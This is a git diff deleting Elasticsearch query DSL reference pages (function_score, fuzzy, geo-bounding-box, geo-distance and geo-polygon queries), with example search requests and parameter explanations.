--------------------------------------------------- -// TEST[setup:my_index] - -<1> Boost for the whole query. -<2> See <> for a list of supported functions. - -NOTE: The scores produced by the filtering query of each function do not matter. - -If no filter is given with a function this is equivalent to specifying -`"match_all": {}` - -First, each document is scored by the defined functions. 
The parameter -`score_mode` specifies how the computed scores are combined: - -[horizontal] -`multiply`:: scores are multiplied (default) -`sum`:: scores are summed -`avg`:: scores are averaged -`first`:: the first function that has a matching filter - is applied -`max`:: maximum score is used -`min`:: minimum score is used - -Because scores can be on different scales (for example, between 0 and 1 for decay functions but arbitrary for `field_value_factor`) and also -because sometimes a different impact of functions on the score is desirable, the score of each function can be adjusted with a user defined -`weight`. The `weight` can be defined per function in the `functions` array (example above) and is multiplied with the score computed by -the respective function. -If weight is given without any other function declaration, `weight` acts as a function that simply returns the `weight`. - -In case `score_mode` is set to `avg` the individual scores will be combined by a **weighted** average. -For example, if two functions return score 1 and 2 and their respective weights are 3 and 4, then their scores will be combined as -`(1*3+2*4)/(3+4)` and **not** `(1*3+2*4)/2`. - -The new score can be restricted to not exceed a certain limit by setting -the `max_boost` parameter. The default for `max_boost` is FLT_MAX. - -The newly computed score is combined with the score of the -query. The parameter `boost_mode` defines how: - -[horizontal] -`multiply`:: query score and function score is multiplied (default) -`replace`:: only function score is used, the query score is ignored -`sum`:: query score and function score are added -`avg`:: average -`max`:: max of query score and function score -`min`:: min of query score and function score - -By default, modifying the score does not change which documents match. To exclude -documents that do not meet a certain score threshold the `min_score` parameter can be set to the desired score threshold. - -NOTE: For `min_score` to work, **all** documents returned by the query need to be scored and then filtered out one by one. - -[[score-functions]] - -The `function_score` query provides several types of score functions. - -* <> -* <> -* <> -* <> -* <>: `gauss`, `linear`, `exp` - -[[function-script-score]] -==== Script score - -The `script_score` function allows you to wrap another query and customize -the scoring of it optionally with a computation derived from other numeric -field values in the doc using a script expression. Here is a -simple sample: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "function_score": { - "query": { - "match": { "message": "elasticsearch" } - }, - "script_score": { - "script": { - "source": "Math.log(2 + doc['my-int'].value)" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -[IMPORTANT] -==== -In {es}, all document scores are positive 32-bit floating point numbers. - -If the `script_score` function produces a score with greater precision, it is -converted to the nearest 32-bit float. - -Similarly, scores must be non-negative. Otherwise, {es} returns an error. -==== - -On top of the different scripting field values and expression, the -`_score` script parameter can be used to retrieve the score based on the -wrapped query. - -Scripts compilation is cached for faster execution. 
If the script has -parameters that it needs to take into account, it is preferable to reuse the -same script, and provide parameters to it: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "function_score": { - "query": { - "match": { "message": "elasticsearch" } - }, - "script_score": { - "script": { - "params": { - "a": 5, - "b": 1.2 - }, - "source": "params.a / Math.pow(params.b, doc['my-int'].value)" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -Note that unlike the `custom_score` query, the -score of the query is multiplied with the result of the script scoring. If -you wish to inhibit this, set `"boost_mode": "replace"` - -[[function-weight]] -==== Weight - -The `weight` score allows you to multiply the score by the provided -`weight`. This can sometimes be desired since boost value set on -specific queries gets normalized, while for this score function it does -not. The number value is of type float. - -[source,js] --------------------------------------------------- -"weight" : number --------------------------------------------------- -// NOTCONSOLE -// I couldn't come up with a good example for this one. - -[[function-random]] -==== Random - -The `random_score` generates scores that are uniformly distributed from 0 up to -but not including 1. By default, it uses the internal Lucene doc ids as a -source of randomness, which is very efficient but unfortunately not -reproducible since documents might be renumbered by merges. - -In case you want scores to be reproducible, it is possible to provide a `seed` -and `field`. The final score will then be computed based on this seed, the -minimum value of `field` for the considered document and a salt that is computed -based on the index name and shard id so that documents that have the same -value but are stored in different indexes get different scores. Note that -documents that are within the same shard and have the same value for `field` -will however get the same score, so it is usually desirable to use a field that -has unique values for all documents. A good default choice might be to use the -`_seq_no` field, whose only drawback is that scores will change if the document -is updated since update operations also update the value of the `_seq_no` field. - -NOTE: It was possible to set a seed without setting a field, but this has been -deprecated as this requires loading fielddata on the `_id` field which consumes -a lot of memory. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "function_score": { - "random_score": { - "seed": 10, - "field": "_seq_no" - } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -[[function-field-value-factor]] -==== Field Value factor - -The `field_value_factor` function allows you to use a field from a document to -influence the score. It's similar to using the `script_score` function, however, -it avoids the overhead of scripting. If used on a multi-valued field, only the -first value of the field is used in calculations. 
- -As an example, imagine you have a document indexed with a numeric `my-int` -field and wish to influence the score of a document with this field, an example -doing so would look like: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "function_score": { - "field_value_factor": { - "field": "my-int", - "factor": 1.2, - "modifier": "sqrt", - "missing": 1 - } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -Which will translate into the following formula for scoring: - -`sqrt(1.2 * doc['my-int'].value)` - -There are a number of options for the `field_value_factor` function: - -[horizontal] -`field`:: - - Field to be extracted from the document. - -`factor`:: - - Optional factor to multiply the field value with, defaults to `1`. - -`modifier`:: - - Modifier to apply to the field value, can be one of: `none`, `log`, - `log1p`, `log2p`, `ln`, `ln1p`, `ln2p`, `square`, `sqrt`, or `reciprocal`. - Defaults to `none`. - -[cols="<,<",options="header",] -|======================================================================= -| Modifier | Meaning - -| `none` | Do not apply any multiplier to the field value -| `log` | Take the {wikipedia}/Common_logarithm[common logarithm] of the field value. - Because this function will return a negative value and cause an error if used on values - between 0 and 1, it is recommended to use `log1p` instead. -| `log1p` | Add 1 to the field value and take the common logarithm -| `log2p` | Add 2 to the field value and take the common logarithm -| `ln` | Take the {wikipedia}/Natural_logarithm[natural logarithm] of the field value. - Because this function will return a negative value and cause an error if used on values - between 0 and 1, it is recommended to use `ln1p` instead. -| `ln1p` | Add 1 to the field value and take the natural logarithm -| `ln2p` | Add 2 to the field value and take the natural logarithm -| `square` | Square the field value (multiply it by itself) -| `sqrt` | Take the {wikipedia}/Square_root[square root] of the field value -| `reciprocal` | {wikipedia}/Multiplicative_inverse[Reciprocate] the field value, same as `1/x` where `x` is the field's value -|======================================================================= - -`missing`:: - - Value used if the document doesn't have that field. The modifier - and factor are still applied to it as though it were read from the document. - -NOTE: Scores produced by the `field_value_score` function must be -non-negative, otherwise an error will be thrown. The `log` and `ln` modifiers -will produce negative values if used on values between 0 and 1. Be sure to limit -the values of the field with a range filter to avoid this, or use `log1p` and -`ln1p`. - -NOTE: Keep in mind that taking the log() of 0, or the square root of a -negative number is an illegal operation, and an exception will be thrown. Be -sure to limit the values of the field with a range filter to avoid this, or use -`log1p` and `ln1p`. - - -[[function-decay]] -==== Decay functions - -Decay functions score a document with a function that decays depending -on the distance of a numeric field value of the document from a user -given origin. This is similar to a range query, but with smooth edges -instead of boxes. - -To use distance scoring on a query that has numerical fields, the user -has to define an `origin` and a `scale` for each field. 
The `origin` -is needed to define the ``central point'' from which the distance -is calculated, and the `scale` to define the rate of decay. The -decay function is specified as - -[source,js] --------------------------------------------------- -"DECAY_FUNCTION": { <1> - "FIELD_NAME": { <2> - "origin": "11, 12", - "scale": "2km", - "offset": "0km", - "decay": 0.33 - } -} --------------------------------------------------- -// NOTCONSOLE -<1> The `DECAY_FUNCTION` should be one of `linear`, `exp`, or `gauss`. -<2> The specified field must be a numeric, date, or geo-point field. - -In the above example, the field is a <> and origin can -be provided in geo format. `scale` and `offset` must be given with a unit in -this case. If your field is a date field, you can set `scale` and `offset` as -days, weeks, and so on. Example: - - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "function_score": { - "gauss": { - "@timestamp": { - "origin": "2013-09-17", <1> - "scale": "10d", - "offset": "5d", <2> - "decay": 0.5 <2> - } - } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -<1> The date format of the origin depends on the <> defined in - your mapping. If you do not define the origin, the current time is used. -<2> The `offset` and `decay` parameters are optional. - -[horizontal] -`origin`:: - The point of origin used for calculating distance. Must be given as a - number for numeric field, date for date fields and geo point for geo fields. - Required for geo and numeric field. For date fields the default is `now`. Date - math (for example `now-1h`) is supported for origin. - -`scale`:: - Required for all types. Defines the distance from origin + offset at which the computed - score will equal `decay` parameter. For geo fields: Can be defined as number+unit (1km, 12m,...). - Default unit is meters. For date fields: Can to be defined as a number+unit ("1h", "10d",...). - Default unit is milliseconds. For numeric field: Any number. - -`offset`:: - If an `offset` is defined, the decay function will only compute the - decay function for documents with a distance greater than the defined - `offset`. The default is 0. - -`decay`:: - The `decay` parameter defines how documents are scored at the distance - given at `scale`. If no `decay` is defined, documents at the distance - `scale` will be scored 0.5. - -In the first example, your documents might represents hotels and contain a geo -location field. You want to compute a decay function depending on how -far the hotel is from a given location. You might not immediately see -what scale to choose for the gauss function, but you can say something -like: "At a distance of 2km from the desired location, the score should -be reduced to one third." -The parameter "scale" will then be adjusted automatically to assure that -the score function computes a score of 0.33 for hotels that are 2km away -from the desired location. - - -In the second example, documents with a field value between 2013-09-12 and 2013-09-22 would get a weight of 1.0 and documents which are 15 days from that date a weight of 0.5. 
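As a quick check of that last claim, here is the arithmetic for the date example
above (`gauss`, `scale` of `10d`, `offset` of `5d`, `decay` of `0.5`), using the
normal decay shape defined in the next section. A document 15 days from the
origin lies exactly `scale` beyond the `offset`, so it scores exactly the
configured `decay`:

[source,latex]
----
\sigma^2 = -\frac{\text{scale}^2}{2\ln(\text{decay})}
         = -\frac{10^2}{2\ln(0.5)} \approx 72.13

S = \exp\left(-\frac{(15 - 5)^2}{2\sigma^2}\right)
  = \exp\left(-\frac{100}{144.27}\right) = 0.5
----

Distances here are measured in days; the `offset` of 5 days is subtracted from
the 15 day distance before the decay is applied.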
- -===== Supported decay functions - -The `DECAY_FUNCTION` determines the shape of the decay: - -`gauss`:: -+ --- -Normal decay, computed as: - -image:images/Gaussian.png[] - -where image:images/sigma.png[] is computed to assure that the score takes the value `decay` at distance `scale` from `origin`+-`offset` - -// \sigma^2 = -scale^2/(2 \cdot ln(decay)) -image:images/sigma_calc.png[] - -See <> for graphs demonstrating the curve generated by the `gauss` function. - --- - -`exp`:: -+ --- -Exponential decay, computed as: - -image:images/Exponential.png[] - -where again the parameter image:images/lambda.png[] is computed to assure that the score takes the value `decay` at distance `scale` from `origin`+-`offset` - -// \lambda = ln(decay)/scale -image:images/lambda_calc.png[] - -See <> for graphs demonstrating the curve generated by the `exp` function. - --- - -`linear`:: -+ --- -Linear decay, computed as: - -image:images/Linear.png[]. - - -where again the parameter `s` is computed to assure that the score takes the value `decay` at distance `scale` from `origin`+-`offset` - -image:images/s_calc.png[] - -In contrast to the normal and exponential decay, this function actually -sets the score to 0 if the field value exceeds twice the user given -scale value. --- - -For single functions the three decay functions together with their parameters can be visualized like this (the field in this example called "age"): - -image:images/decay_2d.png[width=600] - -===== Multi-values fields - -If a field used for computing the decay contains multiple values, per default the value closest to the origin is chosen for determining the distance. -This can be changed by setting `multi_value_mode`. - -[horizontal] -`min`:: Distance is the minimum distance -`max`:: Distance is the maximum distance -`avg`:: Distance is the average distance -`sum`:: Distance is the sum of all distances - -Example: - -[source,js] --------------------------------------------------- - "DECAY_FUNCTION": { - "FIELD_NAME": { - "origin": ..., - "scale": ... - }, - "multi_value_mode": "avg" - } --------------------------------------------------- -// NOTCONSOLE - - -==== Detailed example - -Suppose you are searching for a hotel in a certain town. Your budget is -limited. Also, you would like the hotel to be close to the town center, -so the farther the hotel is from the desired location the less likely -you are to check in. - -You would like the query results that match your criterion (for -example, "hotel, Nancy, non-smoker") to be scored with respect to -distance to the town center and also the price. - -Intuitively, you would like to define the town center as the origin and -maybe you are willing to walk 2km to the town center from the hotel. + -In this case your *origin* for the location field is the town center -and the *scale* is ~2km. - -If your budget is low, you would probably prefer something cheap above -something expensive. For the price field, the *origin* would be 0 Euros -and the *scale* depends on how much you are willing to pay, for example 20 Euros. - -In this example, the fields might be called "price" for the price of the -hotel and "location" for the coordinates of this hotel. - -The function for `price` in this case would be - -[source,js] --------------------------------------------------- -"gauss": { <1> - "price": { - "origin": "0", - "scale": "20" - } -} --------------------------------------------------- -// NOTCONSOLE -<1> This decay function could also be `linear` or `exp`. 
- -and for `location`: - -[source,js] --------------------------------------------------- - -"gauss": { <1> - "location": { - "origin": "11, 12", - "scale": "2km" - } -} --------------------------------------------------- -// NOTCONSOLE -<1> This decay function could also be `linear` or `exp`. - -Suppose you want to multiply these two functions on the original score, -the request would look like this: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "function_score": { - "functions": [ - { - "gauss": { - "price": { - "origin": "0", - "scale": "20" - } - } - }, - { - "gauss": { - "location": { - "origin": "11, 12", - "scale": "2km" - } - } - } - ], - "query": { - "match": { - "properties": "balcony" - } - }, - "score_mode": "multiply" - } - } -} --------------------------------------------------- - -Next, we show how the computed score looks like for each of the three -possible decay functions. - -[[gauss-decay]] -===== Normal decay, keyword `gauss` - -When choosing `gauss` as the decay function in the above example, the -contour and surface plot of the multiplier looks like this: - -image::https://f.cloud.github.com/assets/4320215/768157/cd0e18a6-e898-11e2-9b3c-f0145078bd6f.png[width="700px"] - -image::https://f.cloud.github.com/assets/4320215/768160/ec43c928-e898-11e2-8e0d-f3c4519dbd89.png[width="700px"] - -Suppose your original search results matches three hotels : - -* "Backback Nap" -* "Drink n Drive" -* "BnB Bellevue". - -"Drink n Drive" is pretty far from your defined location (nearly 2 km) -and is not too cheap (about 13 Euros) so it gets a low factor a factor -of 0.56. "BnB Bellevue" and "Backback Nap" are both pretty close to the -defined location but "BnB Bellevue" is cheaper, so it gets a multiplier -of 0.86 whereas "Backpack Nap" gets a value of 0.66. - -[[exp-decay]] -===== Exponential decay, keyword `exp` - -When choosing `exp` as the decay function in the above example, the -contour and surface plot of the multiplier looks like this: - -image::https://f.cloud.github.com/assets/4320215/768161/082975c0-e899-11e2-86f7-174c3a729d64.png[width="700px"] - -image::https://f.cloud.github.com/assets/4320215/768162/0b606884-e899-11e2-907b-aefc77eefef6.png[width="700px"] - -[[linear-decay]] -===== Linear decay, keyword `linear` - -When choosing `linear` as the decay function in the above example, the -contour and surface plot of the multiplier looks like this: - -image::https://f.cloud.github.com/assets/4320215/768164/1775b0ca-e899-11e2-9f4a-776b406305c6.png[width="700px"] - -image::https://f.cloud.github.com/assets/4320215/768165/19d8b1aa-e899-11e2-91bc-6b0553e8d722.png[width="700px"] - -==== Supported fields for decay functions - -Only numeric, date, and geo-point fields are supported. - -==== What if a field is missing? - -If the numeric field is missing in the document, the function will -return 1. diff --git a/docs/reference/query-dsl/fuzzy-query.asciidoc b/docs/reference/query-dsl/fuzzy-query.asciidoc deleted file mode 100644 index 6a9b6010a1f..00000000000 --- a/docs/reference/query-dsl/fuzzy-query.asciidoc +++ /dev/null @@ -1,105 +0,0 @@ -[[query-dsl-fuzzy-query]] -=== Fuzzy query -++++ -Fuzzy -++++ - -Returns documents that contain terms similar to the search term, as measured by -a {wikipedia}/Levenshtein_distance[Levenshtein edit distance]. - -An edit distance is the number of one-character changes needed to turn one term -into another. 
These changes can include: - -* Changing a character (**b**ox → **f**ox) -* Removing a character (**b**lack → lack) -* Inserting a character (sic → sic**k**) -* Transposing two adjacent characters (**ac**t → **ca**t) - -To find similar terms, the `fuzzy` query creates a set of all possible -variations, or expansions, of the search term within a specified edit distance. -The query then returns exact matches for each expansion. - -[[fuzzy-query-ex-request]] -==== Example requests - -[[fuzzy-query-ex-simple]] -===== Simple example - -[source,console] ----- -GET /_search -{ - "query": { - "fuzzy": { - "user.id": { - "value": "ki" - } - } - } -} ----- - -[[fuzzy-query-ex-advanced]] -===== Example using advanced parameters - -[source,console] ----- -GET /_search -{ - "query": { - "fuzzy": { - "user.id": { - "value": "ki", - "fuzziness": "AUTO", - "max_expansions": 50, - "prefix_length": 0, - "transpositions": true, - "rewrite": "constant_score" - } - } - } -} ----- - -[[fuzzy-query-top-level-params]] -==== Top-level parameters for `fuzzy` -``:: -(Required, object) Field you wish to search. - -[[fuzzy-query-field-params]] -==== Parameters for `` -`value`:: -(Required, string) Term you wish to find in the provided ``. - -`fuzziness`:: -(Optional, string) Maximum edit distance allowed for matching. See <> -for valid values and more information. - - -`max_expansions`:: -+ --- -(Optional, integer) Maximum number of variations created. Defaults to `50`. - -WARNING: Avoid using a high value in the `max_expansions` parameter, especially -if the `prefix_length` parameter value is `0`. High values in the -`max_expansions` parameter can cause poor performance due to the high number of -variations examined. --- - -`prefix_length`:: -(Optional, integer) Number of beginning characters left unchanged when creating -expansions. Defaults to `0`. - -`transpositions`:: -(Optional, Boolean) Indicates whether edits include transpositions of two -adjacent characters (ab → ba). Defaults to `true`. - -`rewrite`:: -(Optional, string) Method used to rewrite the query. For valid values and more -information, see the <>. - -[[fuzzy-query-notes]] -==== Notes -Fuzzy queries will not be executed if <> -is set to false. diff --git a/docs/reference/query-dsl/geo-bounding-box-query.asciidoc b/docs/reference/query-dsl/geo-bounding-box-query.asciidoc deleted file mode 100644 index ca355413b2e..00000000000 --- a/docs/reference/query-dsl/geo-bounding-box-query.asciidoc +++ /dev/null @@ -1,368 +0,0 @@ -[[query-dsl-geo-bounding-box-query]] -=== Geo-bounding box query -++++ -Geo-bounding box -++++ - -A query allowing to filter hits based on a point location using a -bounding box. 
Assuming the following indexed document: - -[source,console] --------------------------------------------------- -PUT /my_locations -{ - "mappings": { - "properties": { - "pin": { - "properties": { - "location": { - "type": "geo_point" - } - } - } - } - } -} - -PUT /my_locations/_doc/1 -{ - "pin": { - "location": { - "lat": 40.12, - "lon": -71.34 - } - } -} --------------------------------------------------- -// TESTSETUP - -Then the following simple query can be executed with a -`geo_bounding_box` filter: - -[source,console] --------------------------------------------------- -GET my_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_bounding_box": { - "pin.location": { - "top_left": { - "lat": 40.73, - "lon": -74.1 - }, - "bottom_right": { - "lat": 40.01, - "lon": -71.12 - } - } - } - } - } - } -} --------------------------------------------------- - -[discrete] -==== Query Options - -[cols="<,<",options="header",] -|======================================================================= -|Option |Description -|`_name` |Optional name field to identify the filter - -|`validation_method` |Set to `IGNORE_MALFORMED` to -accept geo points with invalid latitude or longitude, set to -`COERCE` to also try to infer correct latitude or longitude. (default is `STRICT`). - -|`type` |Set to one of `indexed` or `memory` to defines whether this filter will -be executed in memory or indexed. See <> below for further details -Default is `memory`. -|======================================================================= - -[[query-dsl-geo-bounding-box-query-accepted-formats]] -[discrete] -==== Accepted Formats - -In much the same way the geo_point type can accept different -representations of the geo point, the filter can accept it as well: - -[discrete] -===== Lat Lon As Properties - -[source,console] --------------------------------------------------- -GET my_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_bounding_box": { - "pin.location": { - "top_left": { - "lat": 40.73, - "lon": -74.1 - }, - "bottom_right": { - "lat": 40.01, - "lon": -71.12 - } - } - } - } - } - } -} --------------------------------------------------- - -[discrete] -===== Lat Lon As Array - -Format in `[lon, lat]`, note, the order of lon/lat here in order to -conform with http://geojson.org/[GeoJSON]. - -[source,console] --------------------------------------------------- -GET my_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_bounding_box": { - "pin.location": { - "top_left": [ -74.1, 40.73 ], - "bottom_right": [ -71.12, 40.01 ] - } - } - } - } - } -} --------------------------------------------------- - -[discrete] -===== Lat Lon As String - -Format in `lat,lon`. 
- -[source,console] --------------------------------------------------- -GET my_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_bounding_box": { - "pin.location": { - "top_left": "40.73, -74.1", - "bottom_right": "40.01, -71.12" - } - } - } - } - } -} --------------------------------------------------- - -[discrete] -===== Bounding Box as Well-Known Text (WKT) - -[source,console] --------------------------------------------------- -GET my_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_bounding_box": { - "pin.location": { - "wkt": "BBOX (-74.1, -71.12, 40.73, 40.01)" - } - } - } - } - } -} --------------------------------------------------- - -[discrete] -===== Geohash - -[source,console] --------------------------------------------------- -GET my_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_bounding_box": { - "pin.location": { - "top_left": "dr5r9ydj2y73", - "bottom_right": "drj7teegpus6" - } - } - } - } - } -} --------------------------------------------------- - - -When geohashes are used to specify the bounding the edges of the -bounding box, the geohashes are treated as rectangles. The bounding -box is defined in such a way that its top left corresponds to the top -left corner of the geohash specified in the `top_left` parameter and -its bottom right is defined as the bottom right of the geohash -specified in the `bottom_right` parameter. - -In order to specify a bounding box that would match entire area of a -geohash the geohash can be specified in both `top_left` and -`bottom_right` parameters: - -[source,console] --------------------------------------------------- -GET my_locations/_search -{ - "query": { - "geo_bounding_box": { - "pin.location": { - "top_left": "dr", - "bottom_right": "dr" - } - } - } -} --------------------------------------------------- - -In this example, the geohash `dr` will produce the bounding box -query with the top left corner at `45.0,-78.75` and the bottom right -corner at `39.375,-67.5`. - -[discrete] -==== Vertices - -The vertices of the bounding box can either be set by `top_left` and -`bottom_right` or by `top_right` and `bottom_left` parameters. More -over the names `topLeft`, `bottomRight`, `topRight` and `bottomLeft` -are supported. Instead of setting the values pairwise, one can use -the simple names `top`, `left`, `bottom` and `right` to set the -values separately. - -[source,console] --------------------------------------------------- -GET my_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_bounding_box": { - "pin.location": { - "top": 40.73, - "left": -74.1, - "bottom": 40.01, - "right": -71.12 - } - } - } - } - } -} --------------------------------------------------- - - -[discrete] -==== geo_point Type - -The filter *requires* the `geo_point` type to be set on the relevant -field. - -[discrete] -==== Multi Location Per Document - -The filter can work with multiple locations / points per document. Once -a single location / point matches the filter, the document will be -included in the filter - -[discrete] -[[geo-bbox-type]] -==== Type - -The type of the bounding box execution by default is set to `memory`, -which means in memory checks if the doc falls within the bounding box -range. In some cases, an `indexed` option will perform faster (but note -that the `geo_point` type must have lat and lon indexed in this case). 
-Note, when using the indexed option, multi locations per document field -are not supported. Here is an example: - -[source,console] --------------------------------------------------- -GET my_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_bounding_box": { - "pin.location": { - "top_left": { - "lat": 40.73, - "lon": -74.1 - }, - "bottom_right": { - "lat": 40.10, - "lon": -71.12 - } - }, - "type": "indexed" - } - } - } - } -} --------------------------------------------------- - -[discrete] -==== Ignore Unmapped - -When set to `true` the `ignore_unmapped` option will ignore an unmapped field -and will not match any documents for this query. This can be useful when -querying multiple indexes which might have different mappings. When set to -`false` (the default value) the query will throw an exception if the field -is not mapped. - -[discrete] -==== Notes on Precision - -Geopoints have limited precision and are always rounded down during index time. -During the query time, upper boundaries of the bounding boxes are rounded down, -while lower boundaries are rounded up. As a result, the points along on the -lower bounds (bottom and left edges of the bounding box) might not make it into -the bounding box due to the rounding error. At the same time points alongside -the upper bounds (top and right edges) might be selected by the query even if -they are located slightly outside the edge. The rounding error should be less -than 4.20e-8 degrees on the latitude and less than 8.39e-8 degrees on the -longitude, which translates to less than 1cm error even at the equator. diff --git a/docs/reference/query-dsl/geo-distance-query.asciidoc b/docs/reference/query-dsl/geo-distance-query.asciidoc deleted file mode 100644 index cfb2779659e..00000000000 --- a/docs/reference/query-dsl/geo-distance-query.asciidoc +++ /dev/null @@ -1,221 +0,0 @@ -[[query-dsl-geo-distance-query]] -=== Geo-distance query -++++ -Geo-distance -++++ - -Filters documents that include only hits that exists within a specific -distance from a geo point. 
Assuming the following mapping and indexed -document: - -[source,console] --------------------------------------------------- -PUT /my_locations -{ - "mappings": { - "properties": { - "pin": { - "properties": { - "location": { - "type": "geo_point" - } - } - } - } - } -} - -PUT /my_locations/_doc/1 -{ - "pin": { - "location": { - "lat": 40.12, - "lon": -71.34 - } - } -} --------------------------------------------------- -// TESTSETUP - - -Then the following simple query can be executed with a `geo_distance` -filter: - -[source,console] --------------------------------------------------- -GET /my_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_distance": { - "distance": "200km", - "pin.location": { - "lat": 40, - "lon": -70 - } - } - } - } - } -} --------------------------------------------------- - -[discrete] -==== Accepted Formats - -In much the same way the `geo_point` type can accept different -representations of the geo point, the filter can accept it as well: - -[discrete] -===== Lat Lon As Properties - -[source,console] --------------------------------------------------- -GET /my_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_distance": { - "distance": "12km", - "pin.location": { - "lat": 40, - "lon": -70 - } - } - } - } - } -} --------------------------------------------------- - -[discrete] -===== Lat Lon As Array - -Format in `[lon, lat]`, note, the order of lon/lat here in order to -conform with http://geojson.org/[GeoJSON]. - -[source,console] --------------------------------------------------- -GET /my_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_distance": { - "distance": "12km", - "pin.location": [ -70, 40 ] - } - } - } - } -} --------------------------------------------------- - - -[discrete] -===== Lat Lon As String - -Format in `lat,lon`. - -[source,console] --------------------------------------------------- -GET /my_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_distance": { - "distance": "12km", - "pin.location": "40,-70" - } - } - } - } -} --------------------------------------------------- - -[discrete] -===== Geohash - -[source,console] --------------------------------------------------- -GET /my_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_distance": { - "distance": "12km", - "pin.location": "drm3btev3e86" - } - } - } - } -} --------------------------------------------------- - -[discrete] -==== Options - -The following are options allowed on the filter: - -[horizontal] - -`distance`:: - - The radius of the circle centred on the specified location. Points which - fall into this circle are considered to be matches. The `distance` can be - specified in various units. See <>. - -`distance_type`:: - - How to compute the distance. Can either be `arc` (default), or `plane` (faster, but inaccurate on long distances and close to the poles). - -`_name`:: - - Optional name field to identify the query - -`validation_method`:: - - Set to `IGNORE_MALFORMED` to accept geo points with invalid latitude or - longitude, set to `COERCE` to additionally try and infer correct - coordinates (default is `STRICT`). - -[discrete] -==== geo_point Type - -The filter *requires* the `geo_point` type to be set on the relevant -field. 
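For reference, several of the options above can be combined in a single request.
The following sketch reuses the `my_locations` example from this page; the
`near_pin` query name is an arbitrary label supplied via `_name`:

[source,console]
--------------------------------------------------
GET /my_locations/_search
{
  "query": {
    "bool": {
      "must": {
        "match_all": {}
      },
      "filter": {
        "geo_distance": {
          "distance": "12km",
          "distance_type": "plane",
          "validation_method": "IGNORE_MALFORMED",
          "_name": "near_pin",
          "pin.location": "40,-70"
        }
      }
    }
  }
}
--------------------------------------------------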
- -[discrete] -==== Multi Location Per Document - -The `geo_distance` filter can work with multiple locations / points per -document. Once a single location / point matches the filter, the -document will be included in the filter. - -[discrete] -==== Ignore Unmapped - -When set to `true` the `ignore_unmapped` option will ignore an unmapped field -and will not match any documents for this query. This can be useful when -querying multiple indexes which might have different mappings. When set to -`false` (the default value) the query will throw an exception if the field -is not mapped. diff --git a/docs/reference/query-dsl/geo-polygon-query.asciidoc b/docs/reference/query-dsl/geo-polygon-query.asciidoc deleted file mode 100644 index c3588133211..00000000000 --- a/docs/reference/query-dsl/geo-polygon-query.asciidoc +++ /dev/null @@ -1,155 +0,0 @@ -[[query-dsl-geo-polygon-query]] -=== Geo-polygon query -++++ -Geo-polygon -++++ - -A query returning hits that only fall within a polygon of -points. Here is an example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_polygon": { - "person.location": { - "points": [ - { "lat": 40, "lon": -70 }, - { "lat": 30, "lon": -80 }, - { "lat": 20, "lon": -90 } - ] - } - } - } - } - } -} --------------------------------------------------- - -[discrete] -==== Query Options - -[cols="<,<",options="header",] -|======================================================================= -|Option |Description -|`_name` |Optional name field to identify the filter - -|`validation_method` |Set to `IGNORE_MALFORMED` to accept geo points with -invalid latitude or longitude, `COERCE` to try and infer correct latitude -or longitude, or `STRICT` (default is `STRICT`). -|======================================================================= - -[discrete] -==== Allowed Formats - -[discrete] -===== Lat Long as Array - -Format as `[lon, lat]` - -Note: the order of lon/lat here must -conform with http://geojson.org/[GeoJSON]. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_polygon": { - "person.location": { - "points": [ - [ -70, 40 ], - [ -80, 30 ], - [ -90, 20 ] - ] - } - } - } - } - } -} --------------------------------------------------- - -[discrete] -===== Lat Lon as String - -Format in `lat,lon`. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_polygon": { - "person.location": { - "points": [ - "40, -70", - "30, -80", - "20, -90" - ] - } - } - } - } - } -} --------------------------------------------------- - -[discrete] -===== Geohash - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_polygon": { - "person.location": { - "points": [ - "drn5x1g8cu2y", - "30, -80", - "20, -90" - ] - } - } - } - } - } -} --------------------------------------------------- - -[discrete] -==== geo_point Type - -The query *requires* the <> type to be set on the -relevant field. - -[discrete] -==== Ignore Unmapped - -When set to `true` the `ignore_unmapped` option will ignore an unmapped field -and will not match any documents for this query. 
